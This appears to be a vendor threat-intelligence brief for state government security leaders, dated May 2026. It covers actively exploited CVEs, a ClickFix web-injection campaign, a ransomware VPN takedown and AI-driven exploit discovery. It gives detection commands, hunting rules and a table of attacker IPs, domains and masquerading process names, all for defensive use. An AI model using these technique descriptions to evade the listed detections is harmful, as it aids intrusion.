AI-Driven Exploits, CISA Deadlines, and Ransomware Infrastructure Disruption: What State CISOs Must Act On This Week

<p> <strong> Threat Assessment Level: ELEVATED </strong> (trending toward HIGH) </p> <p> Three actively exploited vulnerabilities carry federal remediation deadlines this week. A structural shift in AI-powered exploit discovery has permanently compressed the window between vulnerability disclosure and weaponization. Meanwhile, the FBI's takedown of criminal VPN infrastructure used by 25 ransomware groups offers only temporary relief &mdash; adversary adaptation is expected within two weeks. </p> <p> State government IT leaders face a convergence of immediate patching obligations, evolving ransomware tradecraft, and a fundamental challenge to existing patch management timelines. This brief provides the intelligence and operational guidance needed to act decisively. </p> <h2> <strong> What Changed </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Development </strong> </p> </th> <th> <p> <strong> Why It Matters for State Government </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> CISA adds CVE-2026-48172 to KEV </strong> (LiteSpeed cPanel Plugin, CVSS 9.8) </p> </td> <td> <p> Root-level privilege escalation actively exploited in the wild. Federal remediation deadline: <strong> 29 May 2026 </strong> . Any state agency using cPanel/LiteSpeed web hosting is exposed. </p> </td> </tr> <tr> <td> <p> <strong> Microsoft SharePoint RCE disclosed </strong> (CVE-2026-45659, CVSS 8.8) </p> </td> <td> <p> Authenticated users with basic Site Member permissions can execute arbitrary code. SharePoint's history of rapid KEV additions (CVE-2026-32201 added in April) makes exploitation likely. </p> </td> </tr> <tr> <td> <p> <strong> 700+ Ghost CMS sites hijacked </strong> (CVE-2026-26980, CVSS 9.4) </p> </td> <td> <p> Active SQL injection campaign since 7 May injects malicious JavaScript into legitimate websites, deploying ClickFix social engineering lures that execute PowerShell payloads on visitor machines. </p> </td> </tr> <tr> <td> <p> <strong> Drupal CVE-2026-9082 KEV deadline: today </strong> (CVSS 9.8) </p> </td> <td> <p> 15,000+ exploitation attempts across 6,000 sites. CISA KEV remediation deadline is <strong> 27 May 2026 </strong> &mdash; any unpatched Drupal instance is overdue. </p> </td> </tr> <tr> <td> <p> <strong> FBI disrupts "First VPN Service" </strong> </p> </td> <td> <p> Criminal anonymization infrastructure used by ~25 ransomware groups since 2014 &mdash; taken down in international operation. Expect 7&ndash;14 day adversary migration period before operations resume on new infrastructure. </p> </td> </tr> <tr> <td> <p> <strong> Kali365 phishing platform confirmed </strong> </p> </td> <td> <p> <strong> FBI PSA confirms complete Microsoft 365 MFA bypass via OAuth device code token theft. State M365 tenants are high-value targets. </strong> </p> </td> </tr> <tr> <td> <p> <strong> AI achieves tier-5 autonomous exploit discovery </strong> </p> </td> <td> <p> Full OS vulnerability sweeps now cost &lt;$20,000. China's mandatory 48-hour disclosure pipeline (RMSV 2021) gives state-backed actors structured access to findings before public disclosure. Patching windows measured in weeks are no longer viable. </p> </td> </tr> <tr> <td> <p> <strong> Nation-state activity: Nimbus Manticore + Volt/Salt Typhoon </strong> </p> </td> <td> <p> <strong> Check Point documents Nimbus Manticore (IRGC/UNC1549) conducting AI-assisted campaigns targeting aviation, software, and government under Operation Epic Fury. Volt Typhoon and Salt Typhoon maintain pre-positioned access in U.S. critical infrastructure with no new indicators this cycle &mdash; absence is not reassurance. </strong> </p> </td> </tr> <tr> <td> <p> <strong> 6 ABB ICS advisories published </strong> </p> </td> <td> <p> <strong> Covering PLCs, SCADA runtime, EV chargers, and building automation &mdash; all systems deployed across state critical infrastructure. </strong> </p> </td> </tr> </tbody> </table> <h2> <strong> Threat Timeline </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Event </strong> </p> </th> <th> <p> <strong> Impact </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 7 May 2026 </p> </td> <td> <p> Ghost CMS exploitation campaign begins (CVE-2026-26980) </p> </td> <td> <p> 700+ websites compromised with ClickFix JavaScript injection </p> </td> </tr> <tr> <td> <p> 20 May 2026 </p> </td> <td> <p> Drupal emergency patch for CVE-2026-9082 (CVSS 9.8) </p> </td> <td> <p> 15,000+ exploitation attempts across 6,000 sites; CISA KEV deadline 27 May </p> </td> </tr> <tr> <td> <p> 21 May 2026 </p> </td> <td> <p> LiteSpeed releases patch for CVE-2026-48172 </p> </td> <td> <p> Zero-day exploitation confirmed prior to patch availability </p> </td> </tr> <tr> <td> <p> 22 May 2026 </p> </td> <td> <p> CISA adds Drupal CVE-2026-9082 to KEV </p> </td> <td> <p> Federal agencies mandated to remediate by 27 May </p> </td> </tr> <tr> <td> <p> 25 May 2026 </p> </td> <td> <p> FBI PSA on Kali365 phishing platform </p> </td> <td> <p> Confirms complete Microsoft 365 MFA bypass via OAuth device code token theft </p> </td> </tr> <tr> <td> <p> 25 May 2026 </p> </td> <td> <p> Check Point publishes Nimbus Manticore (IRGC/UNC1549) analysis </p> </td> <td> <p> AI-assisted malware and SEO poisoning targeting aviation, software, government </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> CISA adds CVE-2026-48172 (LiteSpeed) to KEV </p> </td> <td> <p> Federal remediation deadline: 29 May 2026 </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> Microsoft discloses CVE-2026-45659 (SharePoint RCE) </p> </td> <td> <p> <strong> Authenticated RCE with low-privilege account; patch available </strong> </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> FBI announces "First VPN Service" takedown </p> </td> <td> <p> 32 exit nodes across 27 countries seized; 25 ransomware groups affected </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> Cato CTRL publishes AI zero-day economics brief </p> </td> <td> <p> Documents &lt;$20K full-OS exploit discovery; China's structured pipeline advantage </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> CISA publishes 6 ABB ICS advisories </p> </td> <td> <p> PLCs, SCADA, EV chargers, building automation affected </p> </td> </tr> </tbody> </table> <h2> <strong> Key Threat Analysis </strong> </h2> <h3> <strong> 1. LiteSpeed cPanel Root Escalation (CVE-2026-48172) &mdash; IMMEDIATE ACTION REQUIRED </strong> </h3> <p> A privilege escalation vulnerability in the LiteSpeed User-End cPanel Plugin (versions 2.3&ndash;2.4.4) allows arbitrary script execution with <strong> root privileges </strong> on hosting servers. CISA confirmed active exploitation as a zero-day prior to the 21 May patch. The vulnerability is tagged with espionage motivation targeting U.S. government infrastructure. </p> <p> <strong> What to look for: </strong> Any state agency web hosting environment running cPanel with LiteSpeed. Run this detection command across hosting infrastructure: </p> <p> grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2&gt;/dev/null </p> <p> <strong> Fix: </strong> Upgrade to WHM Plugin 5.3.1.0 (bundles user-end plugin 2.4.7+). CISA deadline: <strong> 29 May 2026 </strong> . </p> <h3> <strong> 2. Microsoft SharePoint Server RCE (CVE-2026-45659) </strong> </h3> <p> A deserialization vulnerability allows any authenticated user with Site Member permissions to execute arbitrary code on SharePoint Server. While Microsoft currently assesses exploitation as "less likely," SharePoint has a documented pattern of rapid escalation &mdash; CVE-2026-32201 was added to the KEV catalog in April 2026. Post-exploitation typically involves web shell deployment for persistent access. </p> <p> <strong> Affected systems: </strong> SharePoint Server Subscription Edition, SharePoint Server 2019, SharePoint Enterprise Server 2016 &mdash; all common in state government hybrid environments connected to Microsoft 365. </p> <p> <strong> Risk assessment: </strong> The low privilege requirement (Site Member, not Site Owner or Admin) dramatically expands the attack surface. Any compromised standard user account becomes a path to server-level code execution. </p> <h3> <strong> 3. Ghost CMS Mass Compromise Campaign (CVE-2026-26980) </strong> </h3> <p> Since 7 May, attackers have exploited a critical SQL injection (CVSS 9.4) in Ghost CMS to hijack 700+ websites. The attack chain is sophisticated: </p> <ol> <li> <strong> Initial access: </strong> Unauthenticated SQL injection steals Admin API keys from the database </li> <li> <strong> Content injection: </strong> Malicious JavaScript injected into published articles </li> <li> <strong> Social engineering: </strong> Visitors see fake CAPTCHA/Cloudflare "ClickFix" screens </li> <li> <strong> Payload delivery: </strong> Victims unknowingly execute Base64-encoded PowerShell commands </li> <li> <strong> Execution: </strong> Payload delivered via rundll32.exe or trojanized Electron application installer </li> </ol> <p> Any state agency running Ghost CMS versions 3.24.0 through 6.19.0 for public-facing websites is vulnerable. The campaign weaponizes trusted .gov content against citizens visiting legitimate state websites. </p> <h3> <strong> 4. Ransomware Ecosystem: Disruption and Adaptation </strong> </h3> <p> The FBI's takedown of "First VPN Service" &mdash; a criminal anonymization network operating since 2014 across 32 exit nodes in 27 countries &mdash; temporarily degrades the operational capability of approximately 25 ransomware groups. The service was advertised exclusively on underground forums Exploit[.]in and XSS[.]is, using protocols designed to evade detection: </p> <ul> <li> <strong> VLESS/Reality </strong> &mdash; disguises VPN traffic as legitimate HTTPS </li> <li> <strong> WireGuard, OpenConnect, Outline </strong> &mdash; standard encrypted tunneling </li> <li> <strong> OpenVPN ECC, L2TP/IPSec </strong> &mdash; legacy protocol support </li> </ul> <p> <strong> Key actors affected: </strong> Groups in the Avaddon/NoEscape ransomware lineage. The Abyss Locker ransomware operation &mdash; which specifically exploits VPN appliances for initial access before deploying ransomware against virtualized infrastructure &mdash; operates within this same ecosystem. </p> <p> <strong> Forecast: </strong> Expect a 7&ndash;14 day operational pause followed by migration to alternative anonymization infrastructure. State government remains a high-value ransomware target due to political visibility, citizen data holdings, and budget-constrained patching timelines. </p> <h3> <strong> 5. AI-Accelerated Exploit Discovery: A Structural Shift </strong> </h3> <p> The most strategically significant finding this cycle is not a single vulnerability but a permanent change in threat economics: </p> <ul> <li> <strong> Anthropic's Claude Mythos Preview </strong> achieved autonomous tier-5 control-flow hijack exploits, including a 27-year-old OpenBSD TCP SACK bug and FreeBSD NFS CVE-2026-4747 </li> <li> <strong> China's Qihoo 360 </strong> claims ~1,000 vulnerabilities discovered via AI-assisted methods </li> <li> <strong> Cost: </strong> A full operating system vulnerability sweep now costs under $20,000 </li> <li> <strong> China's advantage: </strong> The Regulations on Management of Security Vulnerabilities (RMSV 2021) mandate 48-hour disclosure to MIIT, which routes findings to MSS &mdash; giving state-backed actors (Volt Typhoon, Salt Typhoon) structured access to exploits before vendors or defenders are notified </li> </ul> <p> <strong> Implication for state government: </strong> The assumption that "no public proof-of-concept equals low risk" is no longer valid. Legacy systems previously considered "too obscure to target" &mdash; older FreeBSD deployments, embedded network stacks, niche SCADA firmware &mdash; are now economically viable targets for AI-assisted discovery. </p> <h3> <strong> 6. Nation-State Pre-Positioning: Quiet but Not Gone </strong> </h3> <p> <strong> Volt Typhoon </strong> (China) and <strong> Salt Typhoon </strong> (China) &mdash; both documented as pre-positioning within U.S. critical infrastructure for potential disruption during geopolitical crisis &mdash; have not generated new campaign indicators this cycle. This absence is notable, not reassuring. These actors specialize in living-off-the-land techniques (legitimate tools, valid credentials, no malware signatures) that evade traditional detection. The persistent OSINT collection gap may also be masking reporting on their activity. </p> <p> <strong> Nimbus Manticore </strong> (IRGC-affiliated, also tracked as UNC1549) was documented on 25 May conducting AI-assisted malware campaigns and SEO poisoning under Operation Epic Fury targeting aviation, software, and government sectors. </p> <h2> <strong> Predictive Analysis </strong> </h2> <table> <thead> <tr> <th> <p> <strong> Scenario </strong> </p> </th> <th> <p> <strong> Probability </strong> </p> </th> <th> <p> <strong> Timeframe </strong> </p> </th> <th> <p> <strong> Basis </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Ransomware groups resume operations on new anonymization infrastructure after First VPN takedown </p> </td> <td> <p> <strong> HIGH (85%) </strong> </p> </td> <td> <p> 7&ndash;14 days </p> </td> <td> <p> Historical pattern: criminal infrastructure rebuilds rapidly; 25 groups have strong financial motivation </p> </td> </tr> <tr> <td> <p> CVE-2026-45659 (SharePoint RCE) added to CISA KEV catalog </p> </td> <td> <p> <strong> MODERATE-HIGH (65%) </strong> </p> </td> <td> <p> 14&ndash;30 days </p> </td> <td> <p> <strong> SharePoint KEV precedent (CVE-2026-32201 added April 2026); low exploitation barrier; high-value target </strong> </p> </td> </tr> <tr> <td> <p> Ghost CMS ClickFix campaign expands to target .gov websites </p> </td> <td> <p> <strong> MODERATE (55%) </strong> </p> </td> <td> <p> 7&ndash;21 days </p> </td> <td> <p> 700+ sites already compromised; campaign is automated and scaling; any unpatched Ghost instance is at risk </p> </td> </tr> <tr> <td> <p> AI-discovered zero-days exploited against state infrastructure without prior public disclosure </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 30&ndash;90 days </p> </td> <td> <p> China's RMSV pipeline provides structural advantage; &lt;$20K discovery cost removes economic barrier </p> </td> </tr> <tr> <td> <p> Volt Typhoon activity detected in state/local government networks </p> </td> <td> <p> <strong> MODERATE (45%) </strong> </p> </td> <td> <p> 30&ndash;60 days </p> </td> <td> <p> 22+ days without new indicators despite known pre-positioning; detection may lag due to LOTL techniques </p> </td> </tr> <tr> <td> <p> Kali365 phishing platform used against state M365 tenants </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 7&ndash;30 days </p> </td> <td> <p> <strong> FBI PSA confirmed complete MFA bypass; state government M365 deployments are high-value targets </strong> </p> </td> </tr> </tbody> </table> <h2> <strong> SOC Operational Guidance </strong> </h2> <h3> <strong> Detection Priorities </strong> </h3> <table> <thead> <tr> <th> <p> <strong> ATT&amp;CK Technique </strong> </p> </th> <th> <p> <strong> What to Hunt </strong> </p> </th> <th> <p> <strong> Detection Approach </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> T1068 </strong> &mdash; Exploitation for Privilege Escalation </p> </td> <td> <p> LiteSpeed cPanel exploitation artifacts </p> </td> <td> <p> Search cPanel logs for cpanel_jsonapi_func=redisAble; monitor for unexpected root-level process creation on web hosting servers </p> </td> </tr> <tr> <td> <p> <strong> T1190 </strong> &mdash; Exploit Public-Facing Application </p> </td> <td> <p> SharePoint deserialization, Ghost CMS SQL injection, LiteSpeed exploitation </p> </td> <td> <p> WAF alerts on serialized object payloads to SharePoint endpoints; SQL injection signatures against Ghost Content API (/ghost/api/content/) </p> </td> </tr> <tr> <td> <p> <strong> T1059.001 </strong> &mdash; PowerShell </p> </td> <td> <p> ClickFix payload execution from Ghost CMS campaign </p> </td> <td> <p> Alert on powershell.exe spawned by browser processes; Base64-encoded command lines &gt;500 characters; PowerShell downloading and executing DLLs </p> </td> </tr> <tr> <td> <p> <strong> T1218.011 </strong> &mdash; Rundll32 </p> </td> <td> <p> ClickFix second-stage payload </p> </td> <td> <p> rundll32.exe executing DLLs from user temp directories or download folders; unsigned DLLs loaded by rundll32 </p> </td> </tr> <tr> <td> <p> <strong> T1090 </strong> &mdash; Proxy / T1133 &mdash; External Remote Services </p> </td> <td> <p> Ransomware groups using anonymization protocols </p> </td> <td> <p> VLESS/Reality protocol on port 443 (mimics HTTPS but detectable via TLS fingerprinting); unauthorized WireGuard/OpenConnect sessions </p> </td> </tr> <tr> <td> <p> <strong> T1505.003 </strong> &mdash; Web Shell </p> </td> <td> <p> SharePoint post-exploitation persistence </p> </td> <td> <p> New .aspx files in SharePoint web directories; unexpected IIS worker process spawning cmd.exe or PowerShell </p> </td> </tr> <tr> <td> <p> <strong> T1078 </strong> &mdash; Valid Accounts </p> </td> <td> <p> Credential abuse via stolen tokens (Kali365, First VPN) </p> </td> <td> <p> Impossible travel alerts; authentication from known VPN/proxy ASNs; OAuth device code flow from unexpected locations </p> </td> </tr> <tr> <td> <p> <strong> T0831 </strong> &mdash; Manipulation of Control </p> </td> <td> <p> ABB ICS exploitation </p> </td> <td> <p> Anomalous commands to ABB AC500 V2 PLCs; unexpected firmware update attempts on ABB Terra AC chargers; Zenon runtime crashes </p> </td> </tr> </tbody> </table> <h3> <strong> Hunting Hypotheses </strong> </h3> <ol> <li> <strong> Hypothesis: </strong> State web hosting infrastructure running cPanel/LiteSpeed has been compromised via CVE-2026-48172 prior to patch availability. </li> <ul> <li> <strong> Hunt: </strong> Audit all cPanel access logs for the period 1&ndash;21 May 2026 (pre-patch window). Look for privilege escalation indicators, new cron jobs running as root, unauthorized SSH keys added. </li> </ul> <li> <strong> Hypothesis: </strong> A compromised Site Member account is being used to stage SharePoint exploitation. </li> <ul> <li> <strong> Hunt: </strong> Review SharePoint ULS logs for deserialization errors or unusual API calls from accounts that recently had password resets or MFA challenges. Check for new .aspx files in SharePoint hives. </li> </ul> <li> <strong> Hypothesis: </strong> State agency Ghost CMS instances have been injected with malicious JavaScript. </li> <ul> <li> <strong> Hunt: </strong> Crawl all state .gov Ghost CMS sites for injected &lt;script&gt; tags not present in source templates. Check for unauthorized Admin API key generation in Ghost logs. </li> </ul> <li> <strong> Hypothesis: </strong> Ransomware operators are probing state VPN appliances for initial access following First VPN Service disruption. </li> <ul> <li> <strong> Hunt: </strong> Correlate VPN authentication failures with known ransomware TTP patterns &mdash; brute force attempts (T1110) followed by successful authentication from new source IPs, especially from residential proxy ranges. </li> </ul> </ol> <h3> <strong> Blocking Guidance </strong> </h3> <ul> <li> Block VLESS/Reality protocol traffic at perimeter (detectable via JA3/JA4 fingerprint mismatch with legitimate HTTPS) </li> <li> Alert on authentication attempts from ASN 399629 (BL Networks, associated with First VPN Service) </li> <li> Block rundll32.exe execution of DLLs from %TEMP%, %USERPROFILE%\Downloads, and browser cache directories </li> <li> Implement Content Security Policy headers on all state Ghost CMS instances to prevent injected JavaScript execution </li> </ul> <h2> <strong> Sector-Specific Defensive Priorities </strong> </h2> <h3> <strong> Financial Services (State Treasury, Revenue, Pension Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Ransomware groups (25 affected by First VPN takedown) historically target financial data for double extortion </li> <li> <strong> Immediate action: </strong> Verify Veeam backup infrastructure is isolated from domain credentials &mdash; Abyss Locker specifically targets backup deletion before encryption </li> <li> <strong> Detection focus: </strong> Monitor for OAuth device code phishing (Kali365) against treasury M365 accounts; these hold wire transfer authorization </li> <li> <strong> Regulatory note: </strong> India's 12-hour patching mandate for exploited vulnerabilities signals global regulatory direction &mdash; prepare for similar U.S. state-level requirements </li> </ul> <h3> <strong> Energy (State-Operated Utilities, Grid Coordination) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Volt Typhoon pre-positioning for disruption during geopolitical escalation; ABB ICS vulnerabilities in deployed equipment </li> <li> <strong> Immediate action: </strong> Inventory ABB AC500 V2 PLCs and Zenon SCADA runtime deployments; cross-reference against ICSA-26-146-01 through -06 </li> <li> <strong> Detection focus: </strong> Living-off-the-land activity in OT networks &mdash; legitimate admin tools (PowerShell, WMI, PsExec) executing from unexpected source hosts </li> <li> <strong> Architecture: </strong> Ensure OT/IT network segmentation prevents SharePoint or cPanel compromises from pivoting to control system networks </li> </ul> <h3> <strong> Healthcare (State Health Agencies, Medicaid Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Ransomware targeting citizen health records (high extortion value); Ghost CMS ClickFix campaign could compromise public health information portals </li> <li> <strong> Immediate action: </strong> Audit any Ghost CMS instances hosting public health information; patch to 6.19.1+ and rotate API keys </li> <li> <strong> Detection focus: </strong> ClickFix lures on state health websites could deliver malware to citizens &mdash; monitor for reports of fake CAPTCHA screens on .gov health portals </li> <li> <strong> Regulatory note: </strong> HIPAA breach notification obligations amplify ransomware impact; ensure incident response plans account for 60-day notification timeline </li> </ul> <h3> <strong> Government (Executive Agencies, Legislative, Judicial) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Nation-state espionage (Volt Typhoon, Salt Typhoon, Nimbus Manticore); credential theft via Kali365 MFA bypass; SharePoint RCE for document exfiltration </li> <li> <strong> Immediate action: </strong> Patch SharePoint Server across all branches; implement conditional access policies blocking authentication from VPN/proxy ASNs </li> <li> <strong> Detection focus: </strong> Impossible travel on executive accounts; SharePoint document access anomalies (bulk downloads, access to sensitive libraries by accounts that don't normally touch them) </li> <li> <strong> Policy consideration: </strong> Dutch government blocked U.S. acquisition of DigiD on digital sovereignty grounds &mdash; monitor for similar state-level digital identity policy developments </li> </ul> <h3> <strong> Aviation &amp; Logistics (State DOT, Airport Authorities, Port Systems) </strong> </h3> <ul> <li> <strong> Primary threat: </strong> Nimbus Manticore (IRGC/UNC1549) Operation Epic Fury specifically targets aviation; supply chain compromise through logistics software dependencies </li> <li> <strong> Immediate action: </strong> Review npm/PyPI dependencies in any custom logistics or scheduling applications &mdash; Glassworm botnet spread through these ecosystems since September 2025 </li> <li> <strong> Detection focus: </strong> SEO poisoning redirects from transportation-related searches; unusual DNS queries from logistics management systems </li> <li> <strong> Architecture: </strong> Ensure air-gapped or segmented networks for traffic management and port control systems; ABB EV charger vulnerabilities (ICSA-26-146-01) affect transportation infrastructure </li> </ul> <h2> <strong> Prioritized Defense Recommendations </strong> </h2> <h3> <strong> IMMEDIATE (Within 48 Hours) </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 1 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Audit and patch all cPanel/LiteSpeed installations </strong> for CVE-2026-48172. Upgrade to WHM Plugin 5.3.1.0+. CISA KEV deadline: 29 May. Run detection: grep -rE "cpanel_jsonapi_func=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ </p> </td> </tr> <tr> <td> <p> 2 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Apply May 2026 SharePoint security updates </strong> (CVE-2026-45659) to all SharePoint Server instances. Prioritize internet-facing and hybrid-connected farms. Authorize emergency change window if needed. </p> </td> </tr> <tr> <td> <p> 3 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Patch or isolate all Ghost CMS instances </strong> below version 6.19.1. Rotate all Admin API keys. Audit published content for injected JavaScript (&lt;script&gt; tags not in original templates). </p> </td> </tr> <tr> <td> <p> 4 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Verify Drupal CVE-2026-9082 remediation is complete </strong> &mdash; today (27 May) is the CISA KEV deadline for this vulnerability. Confirm no state Drupal instances remain unpatched. </p> </td> </tr> <tr> <td> <p> 5 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Deploy detection rules </strong> for ClickFix indicators: PowerShell spawned by browsers, Base64 commands &gt;500 chars, rundll32.exe loading DLLs from temp directories. </p> </td> </tr> </tbody> </table> <h3> <strong> 7-DAY </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 6 </p> </td> <td> <p> Network Security </p> </td> <td> <p> <strong> Block or alert on VLESS/Reality protocol traffic </strong> on HTTPS ports. Implement JA3/JA4 fingerprint-based detection for VPN-over-HTTPS tunneling. </p> </td> </tr> <tr> <td> <p> 7 </p> </td> <td> <p> SOC </p> </td> <td> <p> <strong> Implement conditional access policies </strong> blocking M365 and VPN authentication from known proxy/anonymizer ASNs. Cross-reference ASN 399629 (BL Networks) against historical auth logs. </p> </td> </tr> <tr> <td> <p> 8 </p> </td> <td> <p> Identity Team </p> </td> <td> <p> <strong> Audit OAuth device code flow configurations </strong> in Azure AD. Restrict device code authentication to managed devices only. This blocks the Kali365 MFA bypass technique. </p> </td> </tr> <tr> <td> <p> 9 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Inventory all ABB ICS deployments </strong> (AC500 V2 PLCs, Zenon SCADA, Terra AC chargers, B&amp;R Automation Runtime). Cross-reference against CISA advisories ICSA-26-146-01 through -06. Schedule vendor-recommended updates. </p> </td> </tr> <tr> <td> <p> 10 </p> </td> <td> <p> Development/DevOps </p> </td> <td> <p> <strong> Audit npm and PyPI dependencies </strong> in all state-developed applications for Glassworm botnet indicators. Pin dependencies to verified commit SHAs. Review VS Code extensions installed on developer workstations. </p> </td> </tr> </tbody> </table> <h3> <strong> 30-DAY (Strategic) </strong> </h3> <table> <thead> <tr> <th> <p> <strong> Priority </strong> </p> </th> <th> <p> <strong> Owner </strong> </p> </th> <th> <p> <strong> Action </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 11 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Reassess patch management SLAs in light of AI-accelerated exploit discovery. Current 30-day windows for critical vulnerabilities are inadequate. Recommend: 72-hour SLA for internet-facing systems with active exploitation, 7-day for critical CVSS without exploitation evidence. </strong> </p> </td> </tr> <tr> <td> <p> 12 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Commission red team assessment </strong> of SharePoint hybrid environments, focusing on privilege escalation paths from Site Member to server-level code execution. </p> </td> </tr> <tr> <td> <p> 13 </p> </td> <td> <p> CISO/Legal </p> </td> <td> <p> <strong> Review incident response plans </strong> for ransomware scenarios accounting for the post-takedown period. Groups migrating infrastructure often test new capabilities against targets of opportunity. Ensure backup isolation, communication plans, and legal/regulatory notification timelines are current. </p> </td> </tr> <tr> <td> <p> 14 </p> </td> <td> <p> IT Operations </p> </td> <td> <p> <strong> Implement network segmentation review </strong> ensuring OT/ICS networks (building automation, water/wastewater SCADA, traffic management) cannot be reached from compromised IT systems (SharePoint, cPanel, Ghost CMS). </p> </td> </tr> <tr> <td> <p> 15 </p> </td> <td> <p> CISO </p> </td> <td> <p> <strong> Evaluate OSINT and threat intelligence feed coverage &mdash; persistent gaps in open-source intelligence collection may be masking nation-state activity reporting. Ensure at least two independent intelligence sources cover each critical threat vector. </strong> </p> </td> </tr> </tbody> </table> <h2> <strong> IOC Blocking Table </strong> </h2> <p> The following indicators are derived from intelligence collection for the campaigns discussed in this report. Implement blocking and alerting as appropriate to your environment. </p> <p> <strong> <em> Note on file hashes: </em> </strong> <em> SHA-256 hashes for malware samples associated with these campaigns are available through Anomali ThreatStream Next-Gen and partner feeds. See the ThreatStream Next-Gen collection for CVE-2026-26980 (Ghost CMS), CVE-2026-48172 (LiteSpeed), and the First VPN Service takedown for current, verified file indicators. </em> </p> <table> <thead> <tr> <th> <p> <strong> Type </strong> </p> </th> <th> <p> <strong> Value </strong> </p> </th> <th> <p> <strong> Context </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> Domain </p> </td> <td> <p> Exploit[.]in </p> </td> <td> <p> Underground forum advertising criminal VPN/ransomware services </p> </td> </tr> <tr> <td> <p> Domain </p> </td> <td> <p> XSS[.]is </p> </td> <td> <p> Underground forum advertising criminal VPN/ransomware services </p> </td> </tr> <tr> <td> <p> Domain </p> </td> <td> <p> discordapp[.]com </p> </td> <td> <p> Abused for C2 and payload delivery in multiple campaigns &mdash; alert on unexpected outbound connections from servers and non-user workstations; do not block wholesale in user environments </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> rundll32.exe </p> </td> <td> <p> Abused for DLL side-loading in ClickFix campaign </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> feedbackAPI.exe </p> </td> <td> <p> Suspicious executable associated with tracked malware </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> SophosAV.exe / auSophos.exe </p> </td> <td> <p> Masquerading filenames (not legitimate Sophos binaries) </p> </td> </tr> <tr> <td> <p> Process Name </p> </td> <td> <p> wmihelper.exe </p> </td> <td> <p> Suspicious WMI helper associated with persistence mechanisms </p> </td> </tr> <tr> <td> <p> Driver </p> </td> <td> <p> UpdateDrv.sys / ped.sys / 3ware.sys </p> </td> <td> <p> BYOVD (Bring Your Own Vulnerable Driver) candidates </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]57 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]70 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]238 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]59 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> <tr> <td> <p> IPv4 </p> </td> <td> <p> 64.95.12[.]114 </p> </td> <td> <p> Infrastructure associated with tracked campaigns </p> </td> </tr> </tbody> </table> <p> Additional IOCs &mdash; including verified file hashes &mdash; for the campaigns discussed in this report are available through ThreatStream Next-Gen and partner feeds. </p> <h2> <strong> The Bottom Line </strong> </h2> <p> State government IT leaders face a week where three separate CVSS 9.0+ vulnerabilities demand simultaneous emergency response, the ransomware ecosystem is temporarily disrupted but actively adapting, and the fundamental economics of exploit discovery have permanently shifted against defenders. </p> <p> The 29 May CISA KEV deadline for CVE-2026-48172 is non-negotiable. SharePoint and Ghost CMS patching cannot wait for the next scheduled maintenance window. And the strategic reality &mdash; that AI can now discover critical exploits faster and cheaper than organizations can deploy patches &mdash; demands a policy-level conversation about whether current patch SLAs are fit for purpose. </p> <p> The FBI's disruption of criminal VPN infrastructure buys time, not safety. Use that window to harden, patch, and hunt. The adversaries will be back online within two weeks with new infrastructure and renewed motivation. </p> <p> <strong> Act now. The math has changed. </strong> </p> <p> <em> Anomali CTI Desk | 2026-05-27 | TLP:GREEN </em> </p> <p> <em> For questions or additional IOC feeds, contact your Anomali account team or access indicators directly via ThreatStream Next-Gen. </em> </p>